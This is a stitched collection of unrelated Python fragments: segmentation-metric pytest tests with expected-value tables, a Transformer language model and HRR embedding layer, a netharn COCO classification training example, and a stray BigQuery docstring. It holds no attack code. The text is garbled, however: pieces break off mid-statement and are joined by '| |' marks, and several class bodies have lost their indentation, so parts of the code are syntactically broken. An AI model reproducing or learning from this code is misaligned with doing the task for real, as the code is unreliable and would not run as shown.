    params = [(None, None, lambda l: (BATCH_SIZE, NUM_CLASSES - l)),
              (None, 'micro', (BATCH_SIZE,)),
              (None, 'macro', (BATCH_SIZE,)),
              ('mean', None, lambda l: (NUM_CLASSES - l,)),
              ('mean', 'micro', None),
              ('mean', 'macro', None)]

    @pytest.mark.parametrize('metric_name', METRICS_LIST)
    @pytest.mark.parametrize('predictions, fmt, axis', PREDICTIONS)
    @pytest.mark.parametrize('batch_agg, multi_agg, exp_shape', params)
    @pytest.mark.parametrize('skip_bg', [False, True])
    def test_shape(self, metric_name, predictions, fmt, axis, batch_agg, multi_agg, exp_shape, skip_bg):
        """Compare expected return value shape with actual return value shape of
        metric evaluation with given params for all metrics from METRICS_LIST.

        Parameters
        ----------
        predictions : np.array
            Variable name containing predictions' array of desired format
        fmt : string
            Denotes predictions format
        axis : None or int
            A class axis
        batch_agg : string
            Cross-batch aggregation type
        multi_agg : string
            Multiclass aggregation type
        exp_shape : None or tuple
            Expected return value shape
        skip_bg : False or True
            If background class should be excluded from metrics evaluation
        """
        if callable(exp_shape):
            # skip_bg is a bool intentionally used as 0/1 here.
            exp_shape = exp_shape(skip_bg)
        metric = SegmentationMetricsByPixels(targets=TARGETS, predictions=predictions, fmt=fmt,
                                             num_classes=NUM_CLASSES, axis=axis, skip_bg=skip_bg)
        res = metric.evaluate(metrics=metric_name, agg=batch_agg, multiclass=multi_agg)
        # Fully aggregated results are scalars, i.e. have no shape.
        res_shape = res.shape if isinstance(res, np.ndarray) else None
        assert res_shape == exp_shape

    @pytest.mark.parametrize('predictions, fmt, axis', PREDICTIONS)
    @pytest.mark.parametrize('batch_agg, exp_shape', [(None, (BATCH_SIZE,)), ('mean', None)])
    def test_shape_accuracy(self, predictions, fmt, axis, batch_agg, exp_shape):
        """Compare expected return value shape with actual return value shape of
        accuracy metric evaluation with given params.

        Parameters
        ----------
        predictions : np.array
            Variable name containing predictions' array of desired format
        fmt : string
            Denotes predictions format
        axis : None or int
            A class axis
        batch_agg : string
            Cross-batch aggregation type
        exp_shape : None or tuple
            Expected return value shape
        """
        metric = SegmentationMetricsByPixels(TARGETS, predictions, fmt, NUM_CLASSES, axis)
        res = metric.evaluate(metrics='accuracy', agg=batch_agg)
        res_shape = res.shape if isinstance(res, np.ndarray) else None
        assert res_shape == exp_shape
class TestResult:
"""Check evaluated metrics return value for various parameters.
There is a following pattern in both tests:
0. Each function is preceded by data for it's parametrization.
1. Parametrizing decorators are applied.
2. Instance of SegmentationMetricsByPixels is being created.
3. Metric is being evaluated with given parameters.
4. It's result is being compared with expected one.
"""
# First param stands for batch aggregation type, second — for multiclass one,
# third represents manually pre-calculated expected output contents for each type of metrics.
params = [(None, None, {'tpr' : np.array([1.00, 1.00, 0.00, 0.50, 1.00, 1.00, 0.50, 1.00, 0.00, 1.00, 0.50, 1.00]),
'fpr' : np.array([0.33, 0.33, 0.00, 0.00, 0.00, 0.25, 0.00, 0.33, 0.33, 0.50, 0.00, 0.00]),
'tnr' : np.array([0.66, 0.66, 1.00, 1.00, 1.00, 0.75, 1.00, 0.66, 0.66, 0.50, 1.00, 1.00]),
'fnr' : np.array([0.00, 0.00, 1.00, 0.50, 0.00, 0.00, 0.50, 0.00, 1.00, 0.00, 0.50, 0.00]),
'prv' : np.array([0.25, 0.25, 0.50, 0.50, 0.50, 0.00, 0.50, 0.25, 0.25, 0.50, 0.50, 0.00]),
'ppv' : np.array([0.50, 0.50, 1.00, 1.00, 1.00, 0.00, 1.00, 0.50, 0.00, 0.66, 1.00, 1.00]),
'fdr' : np.array([0.50, 0.50, 0.00, 0.00, 0.00, 1.00, 0.00, 0.50, 1.00, 0.33, 0.00, 0.00]),
'for' : np.array([0.00, 0.00, 0.50, 0.33, 0.00, 0.00, 0.33, 0.00, 0.33, 0.00, 0.33, 0.00]),
'npv' : np.array([1.00, 1.00, 0.50, 0.66, 1.00, 1.00, 0.66, 1.00, 0.66, 1.00, 0.66, 1.00]),
'plr' : np.array([3.00, 3.00, 0.00, np.inf, np.inf, 4.00,
np.inf, 3.00, 0.00, 2.00, np.inf, np.inf]),
'nlr' : np.array([0.00, 0.00, 1.00, 0.50, 0.00, 0.00, 0.50, 0.00, 1.50, 0.00, 0.50, 0.00]),
'dor' : np.array([np.inf, np.inf, 0.00, np.inf, np.inf, np.inf,
np.inf, np.inf, 0, np.inf, np.inf, np.inf]),
'f1s' : np.array([0.66, 0.66, 0.00, 0.66, 1.00, 0.00,
0.66, 0.66, 0.00, 0.80, 0.66, np.inf]),
'jac' : np.array([0.50, 0.50, 0.00, 0.50, 1.00, 0.00,
0.50, 0.50, 0.00, 0.66, 0.50, np.inf])}),
(None, 'micro', {'tpr' : np.array([0.50, 0.75, 0.50, 0.75]),
'fpr' : np.array([0.25, 0.12, 0.25, 0.12]),
'tnr' : np.array([0.75, 0.87, 0.75, 0.88]),
'fnr' : np.array([0.50, 0.25, 0.50, 0.25]),
'prv' : np.array([0.33, 0.33, 0.33, 0.33]),
'ppv' : np.array([0.50, 0.75, 0.50, 0.75]),
'fdr' : np.array([0.50, 0.25, 0.50, 0.25]),
'for' : np.array([0.25, 0.12, 0.25, 0.12]),
'npv' : np.array([0.75, 0.87, 0.75, 0.88]),
'plr' : np.array([3.00, 10.00, 2.25, 5.00]),
'nlr' : np.array([0.42, 0.18, 0.64, 0.20]),
'dor' : np.array([6.00, np.inf, np.inf, np.inf]),
'f1s' : np.array([0.50, 0.75, 0.50, 0.75]),
'jac' : np.array([0.33, 0.60, 0.33, 0.60])}),
(None, 'macro', {'tpr' : np.array([0.66, 0.83, 0.5, 0.83]),
'fpr' : np.array([0.22, 0.08, 0.22, 0.16]),
'tnr' : np.array([0.77, 0.91, 0.78, 0.84]),
'fnr' : np.array([0.33, 0.16, 0.50, 0.17]),
'prv' : np.array([0.33, 0.33, 0.33, 0.33]),
'ppv' : np.array([0.66, 0.66, 0.50, 0.88]),
'fdr' : np.array([0.33, 0.33, 0.50, 0.11]),
'for' : np.array([0.16, 0.11, 0.22, 0.11]),
'npv' : np.array([0.83, 0.88, 0.77, 0.88]),
'plr' : np.array([2.00, 4.00, | |
layer params.')
p.Define(
'model_dim', 512, 'Model dimension that applies to embedding '
'layers and all Transformer layers.')
p.Define('num_trans_layers', 6, 'Number of Transformer layers.')
p.Define('trans_tpl', layers_with_attention.TransformerLayer.Params(),
'Transformer Layer params.')
p.Define('input_dropout_prob', 0.0, 'Prob at which we do input dropout.')
p.Define(
'residual_dropout_prob', 0.0, 'Dropout prob to the output of '
'each sub-layer before it is added to the sub-layer input.')
p.Define(
'atten_dropout_prob', 0.0, 'Dropout prob to the attention '
'weights in each Transformer attention sub-layer.')
p.Define(
'relu_dropout_prob', 0.0, 'Dropout prob to the inner layer '
'output (ReLU activation) in each Transformer feed-forward '
'sub-layer.')
p.Define('softmax', layers.SimpleFullSoftmax.Params(),
'The softmax layer params.')
# Default config for the transformer layers.
p.trans_tpl.is_decoder = False
p.trans_tpl.mask_self_atten = True
p.trans_tpl.tr_atten_tpl.num_attention_heads = 8
p.trans_tpl.tr_atten_tpl.atten_tpl.enable_ctx_pre_proj = True
p.trans_tpl.tr_atten_tpl.atten_tpl.enable_ctx_post_proj = True
p.trans_tpl.tr_fflayer_tpl.hidden_dim = 2048
return p
@base_layer.initializer
def __init__(self, params):
  """Constructs position embedding, dropout, Transformer stack and softmax."""
  super(TransformerLmNoEmbedding, self).__init__(params)
  p = self.params
  # Push the top-level dropout settings down into the shared layer template so
  # every Transformer sub-layer is built with consistent dropout probs.
  p.trans_tpl.tr_atten_tpl.residual_dropout_prob = p.residual_dropout_prob
  p.trans_tpl.tr_atten_tpl.atten_dropout_prob = p.atten_dropout_prob
  p.trans_tpl.tr_fflayer_tpl.residual_dropout_prob = p.residual_dropout_prob
  p.trans_tpl.tr_fflayer_tpl.relu_dropout_prob = p.relu_dropout_prob

  def _NthLayerParams(n):
    # One independent copy of the shared template per layer.
    tpl = p.trans_tpl.Copy()
    tpl.source_dim = p.model_dim
    tpl.name = 'layer_%d' % n
    return tpl

  with tf.variable_scope(p.name):
    p.position_emb.embedding_dim = p.model_dim
    self.CreateChild('position_emb', p.position_emb)
    self.CreateChild(
        'input_dropout',
        layers.DropoutLayer.Params().Set(
            keep_prob=1.0 - p.input_dropout_prob))
    self.CreateChildren(
        'trans', [_NthLayerParams(n) for n in range(p.num_trans_layers)])
    p.softmax.input_dim = p.model_dim
    p.softmax.num_classes = p.vocab_size
    self.CreateChild('softmax', p.softmax)
def zero_state(self, batch_size):
  """Returns an empty attention-prefix state for every Transformer layer.

  Args:
    batch_size: batch dimension for the zero-length key/value caches.

  Returns:
    A `.NestedMap` keyed 'layer_<i>', each entry holding zero-length 'key'
    and 'value' tensors of shape [batch_size, 0, model_dim].
  """
  p = self.params
  states = py_utils.NestedMap()
  for idx in range(p.num_trans_layers):
    states['layer_%d' % idx] = py_utils.NestedMap(
        key=tf.zeros([batch_size, 0, p.model_dim]),
        value=tf.zeros([batch_size, 0, p.model_dim]))
  return states
@classmethod
def StepOutputDimension(cls, params):
  """Returns the dimensions of the fields produced by `Step`.

  Args:
    params: Layer params for this Transformer LM.

  Returns:
    A `.NestedMap` with `logits` (vocab size) and `last_hidden`
    (softmax input dim, i.e. the model dimension).
  """
  return py_utils.NestedMap(
      logits=params.vocab_size, last_hidden=params.softmax.input_dim)
def Step(self, theta, inputs, paddings, state0, *args, **kwargs):
  """FProp one step.

  Args:
    theta: A `.NestedMap` object containing weights' values of this
      layer and its children layers.
    inputs: a tensor of shape [batch, model_dim].
    paddings: a 0/1 tensor of shape [batch]. Unused here.
    state0: A `.NestedMap` containing the prefix states up to step t-1.
    *args: optional extra arguments.
    **kwargs: optional extra keyword arguments.

  Returns:
    A tuple (output, state1).
    output: A `.NestedMap` with fields.
      logits:
        [batch, vocab_size].
      last_hidden:
        [batch, model_dims].
    state1:
      The updated prefix states including step t.
  """
  # The current step index equals the length of the cached attention prefix.
  _, prefix_len = py_utils.GetShape(state0['layer_0'].key, 2)
  # Only the position embedding of the current (last) step is needed.
  # [1, model_dim]
  posit_embs = self.position_emb.FProp(theta.position_emb,
                                       prefix_len + 1)[-1:, :]
  # [batch, model_dim]
  input_embs = inputs + posit_embs
  input_embs = self.input_dropout.FProp(theta.input_dropout, input_embs)
  # Pack(Flatten()) makes a shallow copy, so state0 is left untouched while
  # the per-layer entries of state1 are replaced below.
  state1 = state0.Pack(state0.Flatten())
  layer_in = input_embs
  for i, (layer, layer_theta) in enumerate(zip(self.trans, theta.trans)):
    layer_prefix_states = state0['layer_%i' % i]
    # [batch, model_dim]
    layer_out, _, updated_prefix_states = layer.ExtendStep(
        layer_theta, layer_in, layer_prefix_states)
    state1['layer_%i' % i] = updated_prefix_states
    layer_in = layer_out
  # [batch, vocab_size]
  logits = self.softmax.Logits(theta=theta.softmax, inputs=layer_out)
  output = py_utils.NestedMap(logits=logits, last_hidden=layer_out)
  return output, state1
def FProp(self, theta, inputs, paddings, state0=None, labels=None):
  """Computes xent loss given the language model input activations.

  Args:
    theta: A `.NestedMap` object containing weights' values of this
      layer and its children layers.
    inputs: Input activation. A tensor of shape [time, batch, model_dim].
    paddings: A 0/1 tensor of shape [time, batch].
    state0: Not used for Transformer.
    labels: If not None, a `.NestedMap` containing the following fields:

      - class_weights, a tensor with shape [time, batch] containing the
        weights for each target word.
      - class_ids, a tensor with shape [time, batch] of int32 dtype containing
        the target class labels.
      - class_probabilities, a tensor with shape [time, batch, vocab_size] of
        float values indicating class-membership probabilities.

  Returns:
    If `labels` is not None, returns (xent_output, None), where
    `xent_output` is a `.NestedMap` as defined by `SoftmaxLayer`'s return
    value. Otherwise, `xent_output` only contains the softmax logits.
    The second element is always None (Transformer keeps no recurrent state).
  """
  p = self.params
  inputs = py_utils.HasRank(inputs, 3)
  seqlen, batch, _ = tf.unstack(tf.shape(inputs), num=3)
  inputs = py_utils.HasShape(inputs, [seqlen, batch, p.model_dim])
  paddings = py_utils.HasShape(paddings, [seqlen, batch])
  # [time, 1, model_dim]; broadcasts over the batch dimension in the add below.
  posit_embs = tf.expand_dims(
      self.position_emb.FProp(theta.position_emb, seqlen), 1)
  # [time, batch, model_dim]
  input_embs = inputs + posit_embs
  input_embs = self.input_dropout.FProp(theta.input_dropout, input_embs)
  layer_in = input_embs
  for layer, layer_theta in zip(self.trans, theta.trans):
    # [time, batch, model_dim]
    layer_out, _ = layer.FProp(layer_theta, layer_in, paddings)
    layer_in = layer_out
  if labels is None:
    # We can only compute the logits here.
    logits = self.softmax.Logits(
        theta=theta.softmax,
        inputs=tf.reshape(layer_out, [seqlen * batch, -1]))
    xent_output = py_utils.NestedMap(
        logits=tf.reshape(logits, [seqlen, batch, -1]))
  elif 'class_ids' in labels:
    xent_output = self.softmax.FProp(
        theta=theta.softmax,
        inputs=layer_out,
        class_weights=labels.class_weights,
        class_ids=labels.class_ids)
  else:
    # Soft labels: class_probabilities must be provided instead of class_ids.
    assert 'class_probabilities' in labels
    xent_output = self.softmax.FProp(
        theta=theta.softmax,
        inputs=layer_out,
        class_weights=labels.class_weights,
        class_probabilities=labels.class_probabilities)
  xent_output.last_hidden = layer_out
  return xent_output, None
class TransformerLm(TransformerLmNoEmbedding):
  """Transformer-based language model with a token embedding layer.

  Extends `TransformerLmNoEmbedding` by looking up token embeddings for the
  int32 input ids before running the Transformer stack.
  (Previous docstring said "Stacked RNN based" — a copy-paste error.)
  """

  @classmethod
  def Params(cls):
    p = super(TransformerLm, cls).Params()
    p.Define('emb', layers.EmbeddingLayer.Params(),
             'The embedding layer params.')
    # Single shard by default; note CommonParams overrides this to 16.
    p.emb.max_num_shards = 1
    return p

  @classmethod
  def CommonParams(cls,
                   model_dim,
                   hidden_dim,
                   num_heads,
                   num_layers,
                   learning_rate,
                   warmup_steps,
                   vocab_size,
                   input_dropout_prob=0.0,
                   residual_dropout_prob=0.1,
                   atten_dropout_prob=0.0,
                   relu_dropout_prob=0.0,
                   softmax_max_alloc=None):
    """Common setup for Transformer language models.

    Args:
      model_dim: model dimension.
      hidden_dim: hidden dimension of feed-forward inner layer.
      num_heads: number of attention heads.
      num_layers: number of layers in the transformer LM.
      learning_rate: learning rate.
      warmup_steps: warmup steps for TransformerLearningRateSchedule.
      vocab_size: vocab size.
      input_dropout_prob: dropout prob to the sums of the token embeddings and
        the position embeddings.
      residual_dropout_prob: dropout prob to the output of each sub-layer before
        it is added to the sub-layer input.
      atten_dropout_prob: dropout prob to the attention weights in each
        Transformer attention sub-layer.
      relu_dropout_prob: dropout prob to the inner layer output (ReLU
        activation) in each Transformer feed-forward sub-layer.
      softmax_max_alloc: If set to a positive integer the soft-max
        computation is chunked into allocations of at most
        softmax_max_alloc; when left to its default value of None no
        chunking is done.

    Returns:
      A Params object containing the parameters that set up a Transformer LM.
    """
    # NOTE(review): learning_rate and warmup_steps are accepted but never used
    # in this method body — presumably consumed by the caller's schedule
    # setup; confirm before removing.
    p = cls.Params()
    p.name = 'transformerlm'
    p.model_dim = model_dim
    p.vocab_size = vocab_size
    p.num_trans_layers = num_layers
    p.input_dropout_prob = input_dropout_prob
    p.residual_dropout_prob = residual_dropout_prob
    p.atten_dropout_prob = atten_dropout_prob
    p.relu_dropout_prob = relu_dropout_prob
    default_params_init = py_utils.WeightInit.Xavier(1.0)
    # Embedding init scaled by 1/sqrt(model_dim); combined with
    # scale_sqrt_depth=True below this follows the usual Transformer scaling.
    emb_params_init = py_utils.WeightInit.Gaussian(1.0 / math.sqrt(p.model_dim))
    p.emb.Set(
        vocab_size=vocab_size,
        embedding_dim=p.model_dim,
        max_num_shards=16,
        params_init=emb_params_init,
        scale_sqrt_depth=True)
    p.position_emb.Set(embedding_dim=p.model_dim, trainable_scaling=False)
    p.trans_tpl.is_decoder = False
    p.trans_tpl.mask_self_atten = True
    p.trans_tpl.tr_atten_tpl.Set(
        num_attention_heads=num_heads, params_init=default_params_init)
    p.trans_tpl.tr_atten_tpl.atten_tpl.Set(
        enable_ctx_pre_proj=True, enable_ctx_post_proj=True)
    p.trans_tpl.tr_fflayer_tpl.Set(
        hidden_dim=hidden_dim, params_init=default_params_init)
    p.softmax.Set(
        num_classes=vocab_size, num_shards=16, params_init=emb_params_init)
    if softmax_max_alloc:
      # If the vocab is very large, computes the softmax chunk-by-chunk.
      p.softmax.chunk_size = max(1, int(softmax_max_alloc / vocab_size))
    return p

  @base_layer.initializer
  def __init__(self, params):
    super(TransformerLm, self).__init__(params)
    p = self.params
    # The embedding table must agree with the softmax vocab and with the
    # model/position-embedding dimensions set up by the parent class.
    assert p.emb.vocab_size == p.vocab_size, ('{} vs. {}'.format(
        p.emb.vocab_size, p.vocab_size))
    assert p.emb.embedding_dim == p.position_emb.embedding_dim, (
        '{} vs. {}'.format(p.emb.embedding_dim, p.position_emb.embedding_dim))
    assert p.emb.embedding_dim == p.model_dim, ('{} vs. {}'.format(
        p.emb.embedding_dim, p.model_dim))
    with tf.variable_scope(p.name):
      self.CreateChild('emb', p.emb)

  def FProp(self, theta, inputs, paddings, state0=None, labels=None):
    """Computes xent loss given the language model input activations.

    Args:
      theta: A `.NestedMap` object containing weights' values of this
        layer and its children layers.
      inputs: Input ids. An int32 tensor of shape [time, batch].
      paddings: A 0/1 tensor of shape [time, batch].
      state0: Not used for Transformer.
      labels: If not None, a `.NestedMap` containing the following fields:

        - class_weights, a tensor with shape [time, batch] containing the
          weights for each target word.
        - class_ids, a tensor with shape [time, batch] of int32 dtype containing
          the target class labels.
        - class_probabilities, a tensor with shape [time, batch, vocab_size] of
          float values indicating class-membership probabilities.

    Returns:
      If `labels` is not None, returns (xent_output, state1), where
      `xent_output` is a `.NestedMap` as defined by `SoftmaxLayer`'s return
      value. Otherwise, `xent_output` only contains the softmax logits.
      Note: state1 is always None here — the parent's FProp returns
      (xent_output, None); Transformer keeps no recurrent state.
    """
    ids = py_utils.HasRank(inputs, 2)
    paddings = py_utils.HasShape(paddings, tf.shape(ids))
    # Token ids -> embeddings; the parent class handles everything else.
    activation = self.emb.EmbLookup(theta.emb, ids)
    return super(TransformerLm, self).FProp(
        theta, activation, paddings, labels=labels)
class HRREmbeddingLayer(base_layer.BaseLayer):
"""HRR embedding layer"""
@classmethod
def Params(cls):
  """Returns layer params for the HRR (Holographic Reduced Representation)
  embedding layer."""
  p = super(HRREmbeddingLayer, cls).Params()
  p.Define('embedding_dim', 0, 'Embedding size')
  p.Define('num_roles', 0, 'Number of different roles (n)')
  # TODO(jmluo)
  # might want to use different m values for different roles.
  p.Define('num_fillers_per_role', 20,
           'Number of different fillers for each role (m)')
  p.Define('e_l', layers.EmbeddingLayer.Params(), 'Lexicalized embedding')
  # note that s is used num_roles times
  p.Define('s', layers.EmbeddingLayer.Params(), 'Signature embedding')
  # p.Define('rs', layers.EmbeddingLayer.Params(), 'Role signature')
  p.Define('mode', 'basic', 'Modes')
  p.Define('merge', False, 'Flag to merge all collections of filler matrices into a big one')
  # NOTE(review): the help string below duplicates the one for 'merge';
  # 'lazy' presumably controls something else (lazy evaluation?) — confirm
  # the intended semantics and reword the help text.
  p.Define('lazy', True, 'Flag to merge all collections of filler matrices into a big one')
  # TODO(jmluo)
  p.Define('vocab_size', 0, 'Vocabulary size')
  p.Define('actual_shards', -1, 'Actual number of shards used. This should not be specified, but computed during __init__ call')
  p.Define('trainable_basis', True, 'trainable basis embeddings')
  return p
@base_layer.initializer
def __init__(self, params):
super(HRREmbeddingLayer, self).__init__(params)
p = self.params
assert p.embedding_dim > 0
assert p.num_roles > 0
assert p.num_fillers_per_role > 0
assert p.vocab_size > | |
<gh_stars>1-10
# -*- coding: utf-8 -*-
"""
This is a simple generalized harness for training a classifier on a coco dataset.
Given a COCO-style dataset data (you can create a sample coco dataset using the
kwcoco CLI), this module trains a classifier on chipped regions denoted by the
coco annotations. These chips are cropped from the image and resized to the
specified ``input_dims``. The default network architecture is resnet50. Other
settings like augmentation, learning rate, batch size, etc can all be specified
via the command line, a config file, or a Python dictionary (see
:class:`ClfConfig` for all available arguments).
For details see the other docstrings in this file and / or try running
yourself.
.. code-block:: bash
# Install netharn
# pip3 install netharn # TODO: uncomment once 0.5.7 is live
pip3 install git+https://gitlab.kitware.com/computer-vision/netharn.git@dev/0.5.7
# Install kwcoco and autogenerate a image toy datasets
pip3 install kwcoco
kwcoco toydata --dst ./toydata_train.json --key shapes1024
kwcoco toydata --dst ./toydata_vali.json --key shapes128 # optional
kwcoco toydata --dst ./toydata_test.json --key shapes256 # optional
# Train a classifier on your dataset
python3 -m netharn.examples.classification \
--name="My Classification Example" \
--train_dataset=./toydata_train.json \
--vali_dataset=./toydata_vali.json \
--test_dataset=./toydata_test.json \
--workdir=$HOME/work/netharn \
--input_dims=224,244 \
--batch_size=32 \
--max_epoch=100 \
--patience=40 \
--xpu=gpu0 \
--schedule=ReduceLROnPlateau-p10-c10 \
--augmenter=medium \
--lr=1e-3
Equivalently you could call this via python
.. code-block:: python
from netharn.examples.classification import setup_harn
kwargs = {
'name': 'My Classification Example',
'train_dataset': './toydata_train.json',
'vali_dataset': './toydata_vali.json',
'workdir': '$HOME/work/netharn',
'input_dims': (224, 244),
'batch_size': 32,
'max_epoch': 100,
'patience': 40,
'xpu': 'auto',
'schedule': 'ReduceLROnPlateau-p10-c10',
'augmenter': 'medium',
'lr': 1e-3,
}
harn = setup_harn(**kwargs)
harn.run()
# TODO: describe what the output of this should look like.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
from os.path import join
import numpy as np
import sys
import torch
import ubelt as ub
import netharn as nh
import kwarray
import scriptconfig as scfg
from netharn.data.channel_spec import ChannelSpec
class ClfConfig(scfg.Config):
    """
    This is the default configuration for running the classification example.

    Instances of this class behave like a dictionary. However, they can also be
    specified on the command line, via kwargs, or by pointing to a YAML/json
    file. See :module:``scriptconfig`` for details of how to use
    :class:`scriptconfig.Config` objects.
    """
    default = {
        'name': scfg.Value('clf_example', help='A human readable tag that is "name" for humans'),
        'workdir': scfg.Path('~/work/netharn', help='Dump all results in your workdir'),

        'workers': scfg.Value(2, help='number of parallel dataloading jobs'),
        'xpu': scfg.Value('auto', help='See netharn.XPU for details. can be auto/cpu/xpu/cuda0/0,1,2,3)'),

        'datasets': scfg.Value('special:shapes256', help='Either a special key or a coco file'),
        'train_dataset': scfg.Value(None),
        'vali_dataset': scfg.Value(None),
        'test_dataset': scfg.Value(None),

        'sampler_backend': scfg.Value(None, help='ndsampler backend'),

        'channels': scfg.Value('rgb', help='special channel code. See ChannelSpec'),

        'arch': scfg.Value('resnet50', help='Network architecture code'),
        'optim': scfg.Value('adam', help='Weight optimizer. Can be SGD, ADAM, ADAMW, etc..'),

        'input_dims': scfg.Value((224, 224), help='Window size to input to the network'),

        'normalize_inputs': scfg.Value(True, help=(
            'if True, precompute training mean and std for data whitening')),

        'balance': scfg.Value(None, help='balance strategy. Can be category or None'),

        'augmenter': scfg.Value('simple', help='type of training dataset augmentation'),

        'batch_size': scfg.Value(3, help='number of items per batch'),
        'num_batches': scfg.Value('auto', help='Number of batches per epoch (mainly for balanced batch sampling)'),

        'max_epoch': scfg.Value(140, help='Maximum number of epochs'),
        'patience': scfg.Value(140, help='Maximum "bad" validation epochs before early stopping'),

        'lr': scfg.Value(1e-4, help='Base learning rate'),
        'decay': scfg.Value(1e-5, help='Base weight decay'),

        'schedule': scfg.Value(
            'step90-120', help=(
                'Special coercible netharn code. Eg: onecycle50, step50, gamma, ReduceLROnPlateau-p10-c10')),

        'init': scfg.Value('noop', help='How to initialized weights: e.g. noop, kaiming_normal, path-to-a-pretrained-model)'),
        'pretrained': scfg.Path(help=('alternative way to specify a path to a pretrained model')),
    }

    def normalize(self):
        # Treat CLI-style null strings as "no pretrained checkpoint given".
        if self['pretrained'] in ['null', 'None']:
            self['pretrained'] = None

        # Supplying a pretrained checkpoint path implies the 'pretrained'
        # weight-initialization strategy.
        if self['pretrained'] is not None:
            self['init'] = 'pretrained'
class ClfModel(nh.layers.Module):
    """
    A simple pytorch classification model.

    Note what I consider as "reproducibility" conventions present in this
    model:

        (1) classes can be specified as a list of class names (or
            technically anything that is :class:`ndsampler.CategoryTree`
            coercible). This helps anyone with your pretrained model to
            understand what its predicting.

        (2) The expected input channels are specified, as a
            :class:`netharn.data.ChannelSpec` coercible (e.g. a number, a
            code like "rgb" or "rgb|disparity", or a dict like structure)
            # TODO: properly define the dict structure, for now just use
            # strings.

        (3) The input statistics are specified as a dict and applied at runtime
            {
                'mean': <tensor to subtract>,
                'std': <tensor to divide by>,
            }
            This means you don't have to remember these values when loading
            data at test time, the network remembers them instead.
            # TODO: this has to be better rectified with channel specifications
            # for now assume only one early fused stream like rgb.

        (4) The inputs and outputs to the network are dictionaries with
            keys hinting at the proper interpretation of the values.

            The inputs provide a mapping from channel spec keys to early-fused
            tensors, which can be used in specific ways (e.g. to connect input
            rgb and disparity signals into late fused network components).

            The outputs provide a mapping to whatever type of output you want
            to provide. DONT JUST RETURN A SOMETIMES TUPLE OF LOSS AND OUTPUTS
            IN SOME RANDOM FORMAT! Instead if your network sometimes returns
            loss then sometimes add the value ``outputs['loss'] = <your
            loss>``. And maybe you do some decoding of the outputs to
            probabilities, in that case add the value ``outputs['class_probs']
            = <class-probs>``. Or maybe you return the logits, so return
            ``outputs['class_logits']``. This is far easier to use than
            returning tuples of data. </rant over>

        (5) A coder that performs postprocessing on batch outputs to
            obtain a useable form for the predictions.

    Example:
        >>> from netharn.examples.classification import *  # NOQA
        >>> classes = ['a', 'b', 'c']
        >>> input_stats = {
        >>>     'mean': torch.Tensor([[[0.1]], [[0.2]], [[0.2]]]),
        >>>     'std': torch.Tensor([[[0.3]], [[0.3]], [[0.3]]]),
        >>> }
        >>> channels = 'rgb'
        >>> self = ClfModel(
        >>>     arch='resnet50', channels=channels,
        >>>     input_stats=input_stats, classes=classes)
        >>> inputs = torch.rand(4, 3, 256, 256)
        >>> outputs = self(inputs)
        >>> self.coder.decode_batch(outputs)
    """
    # NOTE(review): the doctest previously used torch.rand(4, 1, 256, 256),
    # which would fail the 3-channel conv1 built for channels='rgb'; fixed
    # to a 3-channel input.

    def __init__(self, arch='resnet50', classes=1000, channels='rgb',
                 input_stats=None):
        super(ClfModel, self).__init__()

        import ndsampler
        if input_stats is None:
            input_stats = {}
        # Applies (x - mean) / std style whitening at runtime (netharn layer).
        input_norm = nh.layers.InputNorm(**input_stats)

        self.classes = ndsampler.CategoryTree.coerce(classes)
        self.channels = ChannelSpec.coerce(channels)
        chann_norm = self.channels.normalize()
        # Only a single early-fused stream (e.g. rgb) is supported for now.
        assert len(chann_norm) == 1
        in_channels = len(ub.peek(chann_norm.values()))
        num_classes = len(self.classes)

        if arch == 'resnet50':
            from torchvision import models
            model = models.resnet50()

            # Rebuild the first conv and the final fc so they match the
            # requested input channels and number of classes.
            # NOTE(review): stride=3 differs from torchvision resnet50's
            # default conv1 stride of 2 — presumably an intentional extra
            # downsample; confirm.
            new_conv1 = torch.nn.Conv2d(in_channels, 64, kernel_size=7,
                                        stride=3, padding=3, bias=False)
            new_fc = torch.nn.Linear(2048, num_classes, bias=True)

            # Seed the new layers from the pretrained-shape weights.
            # NOTE(review): the slice assumes in_channels <= 3; with more
            # channels this indexing would fail — confirm intended use.
            new_conv1.weight.data[:, 0:in_channels, :, :] = model.conv1.weight.data[0:, 0:in_channels, :, :]
            new_fc.weight.data[0:num_classes, :] = model.fc.weight.data[0:num_classes, :]
            new_fc.bias.data[0:num_classes] = model.fc.bias.data[0:num_classes]

            model.fc = new_fc
            model.conv1 = new_conv1
        else:
            raise KeyError(arch)

        self.input_norm = input_norm
        self.model = model

        self.coder = ClfCoder(self.classes)

    def forward(self, inputs):
        """
        Args:
            inputs (Tensor | dict): Either the input images (as a regular
                pytorch BxCxHxW Tensor) or a dictionary mapping input
                modalities to the input images.

        Returns:
            Dict[str, Tensor]: model output wrapped in a dictionary so its
                clear what the return type is. In this case "energy" is class
                probabilities **before** softmax / normalization is applied.
        """
        if isinstance(inputs, dict):
            # TODO: handle channel modalities later
            assert len(inputs) == 1, (
                'only support one fused stream: e.g. rgb for now ')
            im = ub.peek(inputs.values())
        else:
            im = inputs

        # Whiten, then run the backbone; output is raw (pre-softmax) energy.
        im = self.input_norm(im)
        class_energy = self.model(im)
        outputs = {
            'class_energy': class_energy,
        }
        return outputs
class ClfCoder(object):
    """
    Postprocessor that turns raw classifier outputs into a standard
    dictionary format (class probabilities plus hard decisions). There is
    currently no standard "classification" format other than a dictionary
    with special keys.
    """

    def __init__(self, classes):
        self.classes = classes

    def decode_batch(self, outputs):
        """Decode one batch of network outputs into probs and predictions."""
        energy = outputs['class_energy']
        probs = self.classes.hierarchical_softmax(energy, dim=1)
        cxs, conf = self.classes.decision(
            probs, dim=1, thresh=0.1,
            criterion='entropy',
        )
        return {
            'class_probs': probs,
            'pred_cxs': cxs,
            'pred_conf': conf,
        }
class ClfDataset(torch.utils.data.Dataset):
"""
Efficient loader for classification training on coco samplers.
This is a normal torch dataset that uses :module:`ndsampler` and
:module:`imgaug` for data loading an augmentation.
It also contains a ``make_loader`` method for creating a class balanced
DataLoader. There is little netharn-specific about this class.
Example:
>>> from netharn.examples.classification import * # NOQA
>>> import ndsampler
>>> sampler = ndsampler.CocoSampler.demo()
>>> self = ClfDataset(sampler)
>>> index = 0
>>> self[index]['inputs']['rgb'].shape
>>> loader = self.make_loader(batch_size=8, shuffle=True, num_workers=0, num_batches=10)
>>> for batch in ub.ProgIter(iter(loader), total=len(loader)):
>>> break
>>> print('batch = {}'.format(ub.repr2(batch, nl=1)))
>>> # xdoctest: +REQUIRES(--show)
>>> import kwplot
| |
ID.
dataset_id (string): BigQuery dataset ID.
project_id (string): BigQuery project ID.
